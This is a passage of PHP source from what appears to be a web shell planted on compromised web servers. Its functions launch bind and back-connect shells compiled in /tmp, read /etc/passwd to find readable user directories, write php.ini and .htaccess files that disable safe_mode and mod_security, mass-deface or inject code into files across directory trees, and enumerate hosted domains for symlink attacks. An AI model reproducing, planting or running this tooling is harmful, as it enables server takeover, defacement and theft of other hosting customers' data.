1224 @unlink("/tmp/bp.c");
1225 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1226 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1227 }
1228 if($_POST['p1'] == 'bpp') {
1229 cf("/tmp/bp.pl",$bind_port_p);
1230 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1231 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1232 }
1233 if($_POST['p1'] == 'bcc') {
1234 cf("/tmp/bc.c",$back_connect_c);
1235 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1236 @unlink("/tmp/bc.c");
1237 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1238 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1239 }
1240 if($_POST['p1'] == 'bcp') {
1241 cf("/tmp/bc.pl",$back_connect_p);
1242 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1243 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1244 }
1245 }
1246 echo '</div>';
1247 printFooter();
1248}
1249
1250
1251function actionReadable() {
1252 printHeader();
1253 echo '<h1>Readable Dirs</h1>';
1254 echo '<div class="content">';
1255 $sm = ini_get('safe_mode');
1256 if($sm) {
1257 echo '<br /><b>Error: safe_mode = on</b><br /><br />';
1258 } else {
1259 @$passwd = file('/etc/passwd','r');
1260 if (!$passwd) {
1261 echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
1262 } else {
1263 $pub = array();
1264 $users = array();
1265 $conf = array();
1266 $i = 0;
1267 foreach($passwd as $p) {
1268 $r = explode(':',$p);
1269 $dirz = $r[5].'/public_html/';
1270 if(strpos($r[5],'home')) {
1271 array_push($users,$r[0]);
1272 if (is_readable($dirz)) {
1273 array_push($pub,$dirz);
1274 }
1275 }
1276 }
1277 echo '<br><br>';
1278 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
1279 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
1280 foreach ($pub as $user) {
1281 echo $user."<br>";
1282 }
1283 echo "<br /><br /><br />[+] Complete...\n"."<br />";
1284 }
1285 }
1286 echo '</div>';
1287 printFooter();
1288}
1289
1290function actionBypass() {
1291 printHeader();
1292 echo '<h1>Safe Mode</h1>';
1293 echo '<div class="content">';
1294 echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
1295 echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
1296 if(!empty($_POST['p2']) && isset($_POST['p2']))
1297 {
1298 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1299 fwrite($fil,'<IfModule mod_security.c>
1300 Sec------Engine Off
1301 Sec------ScanPOST Off
1302 </IfModule>');
1303 fclose($fil);
1304 }
1305 if(!empty($_POST['p1'])&& isset($_POST['p1']))
1306 {
1307 $fil=fopen($GLOBALS['cwd']."php.ini","w");
1308 fwrite($fil,'safe_mode=OFF
1309 disable_functions=NONE');
1310 fclose($fil);
1311 }
1312 if(!empty($_POST['p3']) && isset($_POST['p3']))
1313 {
1314 $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1315 fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1316 AddType application/x-httpd-cgi .sh
1317 AddHandler cgi-script .pl
1318 AddHandler cgi-script .pl');
1319 fclose($fil);
1320 }
1321 echo "<br><br /><br /></div>";
1322 echo '</div>';
1323 printFooter();
1324
1325}
1326
1327function actionDeface() {
1328printHeader();
1329echo "<h1>Mass Defacer by SmEvK</h1><div class=content>";
1330?>
1331<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
1332<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
1333<br>file name : <input type=text name=file size=20 value="index.php">
1334<br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
1335<br><input type=submit value="Deface now"></p></form>
1336
1337<?php
1338if ($_POST['a'] == 'Deface') {
1339$mainpath = $_POST[p1];
1340$file = $_POST[p2];
1341$txtContents = $_POST[p3];
1342echo "Mass Defacer script by SmEVK_PaThAn";
1343$dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
1344while ($row = readdir($dir)) {
1345$start = @fopen("$row/$file", "w+");
1346$code = $txtContents;
1347$finish = @fwrite($start, $code);
1348if ($finish) {
1349echo "$row/$file > Done<br><br>";
1350}
1351}
1352
1353}
1354echo '</div>';
1355printFooter();
1356}
1357
1358function actionInjector(){
1359 printHeader();
1360 echo '<h1>Mass Code Injector</h1>';
1361 echo '<div class="content">';
1362
1363 if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
1364 function get_structure($path,$depth) {
1365 global $DS;
1366 $res = array();
1367 if(in_array(0, $depth)) { $res[] = $path; }
1368 if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
1369 $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
1370 if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
1371 }
1372 if(in_array(2, $depth) or in_array(3, $depth)) {
1373 $tmp2 = array();
1374 foreach($tmp1 as $t){
1375 $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
1376 $tmp2 = array_merge($tmp2, $tp2);
1377 }
1378 if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
1379 }
1380 if(in_array(3, $depth)) {
1381 $tmp3 = array();
1382 foreach($tmp2 as $t){
1383 $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
1384 $tmp3 = array_merge($tmp3, $tp3);
1385 }
1386 $res = array_merge($res,$tmp3);
1387 }
1388 return $res;
1389 }
1390
1391 if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
1392 $name = $_POST['name'] ? $_POST['name'] : '*';
1393 $type = $_POST['type'] ? $_POST['type'] : 'html';
1394 $path = $_POST['path'] ? $_POST['path'] : getcwd();
1395 $code = $_POST['code'] ? $_POST['code'] : 'Pakistan Haxors Crew';
1396 $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
1397 $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
1398 $dt = get_structure($path,$depth);
1399 foreach ($dt as $d) {
1400 if($mode == 'a') {
1401 if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
1402 echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
1403 } else {
1404 echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
1405 }
1406 } else {
1407 if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
1408 echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
1409 } else {
1410 echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
1411 }
1412 }
1413 }
1414 } else {
1415 echo '<form method="post" action="">
1416 <table align="center">
1417 <tr>
1418 <td>Directory : </td>
1419 <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
1420 </tr>
1421 <tr>
1422 <td class="title">Mode : </td>
1423 <td>
1424 <select style="width: 100px;" name="mode" class="box">
1425 <option value="a">Apender</option>
1426 <option value="w">Overwriter</option>
1427 </select>
1428 </td>
1429 </tr>
1430 <tr>
1431 <td class="title">File Name & Type : </td>
1432 <td>
1433 <input type="text" style="width: 100px;" name="name" value="*"/>
1434 <select style="width: 100px;" name="type" class="box">
1435 <option value="html">HTML</option>
1436 <option value="htm">HTM</option>
1437 <option value="php" selected="selected">PHP</option>
1438 <option value="asp">ASP</option>
1439 <option value="aspx">ASPX</option>
1440 <option value="xml">XML</option>
1441 <option value="txt">TXT</option>
1442 </select></td>
1443 </tr>
1444 <tr>
1445 <td class="title">Code Inject Depth : </td>
1446 <td>
1447 <input type="checkbox" name="depth[]" value="0" checked="checked"/> 0
1448 <input type="checkbox" name="depth[]" value="1"/> 1
1449 <input type="checkbox" name="depth[]" value="2"/> 2
1450 <input type="checkbox" name="depth[]" value="3"/> 3
1451 </td>
1452 </tr>
1453 <tr>
1454 <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
1455 </tr>
1456 <tr>
1457 <td colspan="2" style="text-align: center;">
1458 <input type="hidden" name="a" value="Injector">
1459 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1460 <input type="hidden" name="p1">
1461 <input type="hidden" name="p2">
1462 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1463 <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
1464 </tr>
1465 </table>
1466 </form>';
1467 }
1468 echo '</div>';
1469 printFooter();
1470}
1471
1472
1473 function actionDomain() {
1474 printHeader();
1475
1476echo '<h1>Local Domains</h1><div class=content>';
1477$file = @implode(@file("/etc/named.conf"));
1478$Domain_path = "/var/named";
1479
1480if (!$file) {
1481$domains = scandir($Domain_path);
1482$count=1;
1483$dc = 0;
1484 echo "<table align=center border=1 width=59% cellpadding=5>
1485<tr><td colspan=2>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>
1486<tr><td>No</td><td>Domain</td><td>User</td></tr>";
1487foreach ($domains as &$domain) {
1488 if (stripos($domain,".db")) {
1489 $domain = str_replace('.db','',$domain);
1490
1491 }
1492 if (strlen($domain) > 6) {
1493
1494 echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>User</td></tr>";
1495
1496
1497 }
1498
1499 }
1500 echo "</table>";
1501}else{
1502 $count = 1;
1503 preg_match_all("#named/(.*?).db#", $file, $r);
1504 $domains = array_unique($r[1]);
1505 echo "<table align=center border=1 width=59% cellpadding=5>
1506<tr><td colspan=2> There are ( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
1507<tr><td>No</td><td>Domain</td><td>User</td></tr>";
1508 foreach ($domains as $domain) {
1509
1510 $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
1511 echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>".$user['name']."</td></tr>";
1512 }
1513}
1514
1515 printFooter();
1516 }
1517
1518if( empty($_POST['a']) )
1519 if(isset($default_action) && function_exists('action' . $default_action))
1520 $_POST['a'] = $default_action;
1521 else
1522 $_POST['a'] = 'SecInfo';
1523if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1524 call_user_func('action' . $_POST['a'])
1525
1526?>